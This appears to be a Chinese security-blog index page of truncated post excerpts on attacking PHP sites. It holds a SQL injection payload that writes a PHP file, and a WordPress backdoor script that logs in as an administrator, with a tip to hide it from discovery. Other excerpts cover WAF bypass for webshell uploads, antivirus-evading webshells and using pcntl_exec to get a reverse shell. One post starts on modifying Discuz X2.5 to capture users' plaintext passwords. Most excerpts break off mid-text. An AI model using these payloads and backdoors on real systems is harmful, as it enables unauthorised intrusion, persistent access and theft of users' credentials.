权限后门系列之一:手动打造WordPress权限后门

screen 2017-12-23 at 16.19.57.jpg

mysql注入写文件

1.select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php' 2.select * from admin where id&nb

sqlmap连接Mysql实现getshell

0x01首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎.语法为:" DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" 或者是"DBMS://DATABASE_FILEPATH"。[1]dbms:代表所使用的数据库,如我们这里是mysql[2]user:对应我们数据库的用户,如我们这里是root[3]password:对应我们数据的密码,如我的服务器为3erver[4]dbma_IP:

waf bypass

工作原因对某站进行渗透,同样是工作原因我不能描述太细致,所以很怂的我只能靠语言文字来描述一下整个思路,再附上这次bypass的马遇到的防火墙是一个没怎么见过的种类,大致fuzz了一下,规则有:1. 检测内容,如果有<, >, _GET, _POST, _REQUEST, phpinfo()等函数直接ban掉2. 检测行为,如果对上传的页面以GET或POST方式传递数据,直接ban掉通过注入找到一个可用的用户以后(没管理),发现一个上传点。在试图上传php时发现,会对里面的内容进行检测

一款好用的php webshell检测工具

PHP-malware-finder 是一款优秀的检测webshell和恶意软件混淆代码的工具,比如以下组件都可以被检测发现。Best PHP ObfuscatorCarbylamineCipher DesignCyklodevJoes Web Tools ObfuscatorP.A.SPHP JiamiPhp Obfuscator EncodeSpinObfWeevely3atomikucobra obfuscatorphpencodetenncweb-malware-collectionwe

猥琐的wordpress后门

一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);


改包上传 绕过安全狗

03.png

PHP Hacker代码审计秘籍

本文不是 PHP 教程,本文只针对 PHP 的各种奇淫技巧进行整理和证明,在进行渗透测试(WEB 安全)的学习中,经常需要涉及到 PHP 编程,或者 PHP 编写 Webshell 或者一句话木马,一般的 PHP 马经常被各种软件发现被杀。与此同时,网络经常流传一些免杀马(当然免杀一句话很有可能藏后门大家都是知道的),那么那些免杀是怎么做出来的?打开看,可能就是非常难看难以阅读的 PHP 代码(为了混淆各种杀软的侦察)。 

当然,怎么样写出那种奇奇怪怪的东西呢?这就取决于你对 PHP 这门语言的了解程度:你是一个 PHP 开发者,通过 PHP 培训获得一定的技能?还是一个渗透测试人员,通过平时在渗透测试过程中接触 PHP,查看 PHP 官方手册学习 PHP。   

嗯……不管你是怎么样的契机接触了 PHP,并且看到了这篇文章,我都希望你看到这篇文章的时候,能够知道一些之前不知道的东西;或者你都对这些技巧了然于胸,能够帮助你回忆这些很有趣的 PHP Trick。


PHP被遗漏的执行函数

我见很多管理员在封杀PHP危险函数的时候一般都是这样的:disable_functions = proc_open,exec,passthru,shell_exec,system,popen

但是如果编译PHP时带--enable-pcntl参数就危险了,可以用pcntl_exec函数执行指定程序,也可以反弹一个SHELL,在PHPINFO里查看编译参数。

描述:pcntl_exec — 在当前进程空间执行指定程序

EXP:

教你截获dz2.5的用户明文密码、管理员明文密码、邮箱、登录问答

最近碰到个discuz X2.5论坛,通过旁注拿到了webshell,但目标是要拿到这个discuz论坛的用户资料(包括密码)。初步想法是在discuz的代码里动下手脚,找到用户登录成功代码,然后加段代码将成功认证的用户密码等信息写到一个文件上去。下面逐步作记录。


第一个任务是截取论坛用户成功认证的登录密码。版本:discuz X2.5最新版

----begin-----------------------------------------